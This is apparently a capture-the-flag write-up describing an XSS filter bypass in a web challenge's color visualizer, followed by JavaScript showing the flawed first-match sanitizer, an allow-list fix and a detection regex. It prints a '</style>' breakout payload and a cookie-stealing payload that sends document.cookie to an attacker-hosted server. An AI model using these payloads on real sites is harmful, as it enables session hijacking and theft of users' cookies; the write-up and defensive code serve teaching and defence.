![74ebcb8ed17db8be4ff34481a6a210aa.png](320fd670dd1845439d57d2d6a8ac9abd.png)

/admin

![03ba8f48dae28b13e3d6135b7e16db9d.png](a33833c3c1b34de4a2696506094f382f.png)

Let's check out the source of the color visualizer.

![b5c6b49a7587b503bdf6ddf89a0efbe0.png](4795d9d2f2a34345a816d4e2435b17a7.png)

In the source we can see how it sets the background color, and that it sanitizes the input to protect against XSS. Or does it? I noticed in my tests that only the initial `<>` is being filtered out. Anything after that is fine. So by breaking out of the `<style>` element in which the color value is set, we can inject our XSS payload:

`<></style><img src=x onerror=alert(document.cookie)>`

![5b31e3f231e70dcda24e0ac37c4936cf.png](0d3009eb17ef47d6a38cb2b9a9c55a08.png)

So we have XSS, but we want the cookie sent back to us rather than shown in an alert. Here is the script that I hosted on my VPS:

![47190ff94ae10196255595d93e7a0ab0.png](9b450e01a3f94f19aa05ab12a241c451.png)

And here is the new payload:

`<></style><img src=x onerror=document.location='http://REDACTED/cookie.php?c='+document.cookie>;`

Now we can pass this through the Admin page:

URL to visit: [http://chall.csivit.com:30256/view](http://chall.csivit.com:30256/view)

Color to see: payload

![8ea6baf7cbb4aa83288691d4d269d0b5.png](dab45ef3a39d439fa0f95fa43cebc41c.png)

---

Back to [[_WebSite Publish/CTF/CTF Index|CTF Index]]

Tags: #ctf #web #xss #css

Related:
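The filter bypass above, as an added example that is not code from the write-up or the challenge: a reconstruction of the kind of first-match-only strip the post describes (the exact implementation is an assumption), next to an allow-list validator that treats the color as data rather than trying to clean it. The `<style>` layout in the render helpers is also assumed.

```javascript
// Flawed filter (assumed reconstruction): String.prototype.replace with a
// string pattern replaces only the FIRST match, so one sacrificial "<>" pair
// uses up the filter and everything after it passes through untouched.
function weakSanitize(color) {
  return color.replace("<", "").replace(">", "");
}

// Hardened approach: do not strip "dangerous" characters; accept only values
// that are unambiguously a CSS color (hex forms or a short named-color list)
// and reject everything else.
const NAMED_COLORS = new Set([
  "red", "green", "blue", "black", "white", "yellow", "purple", "orange",
]);
const HEX_COLOR = /^#(?:[0-9a-f]{3}|[0-9a-f]{6})$/i;

function strictColor(color) {
  const value = String(color).trim();
  if (HEX_COLOR.test(value) || NAMED_COLORS.has(value.toLowerCase())) {
    return value;
  }
  return null; // not a color: refuse instead of "cleaning"
}

// Assumed page layout: the color is interpolated inside a <style> element,
// which is why a "</style>" inside the value escapes the CSS context.
function renderWeak(color) {
  return `<style>body { background: ${weakSanitize(color)}; }</style>`;
}

function renderStrict(color) {
  const safe = strictColor(color);
  if (safe === null) throw new Error("invalid color value");
  return `<style>body { background: ${safe}; }</style>`;
}

// Detection hint for request logs: a color parameter never legitimately
// contains angle brackets or a closing style tag.
function looksLikeStyleBreakout(color) {
  return /<\/style/i.test(color) || /[<>]/.test(color);
}
```

With the post's first payload, `weakSanitize` returns `</style><img src=x onerror=alert(document.cookie)>`, while `strictColor` returns `null` and `renderStrict` refuses to render it.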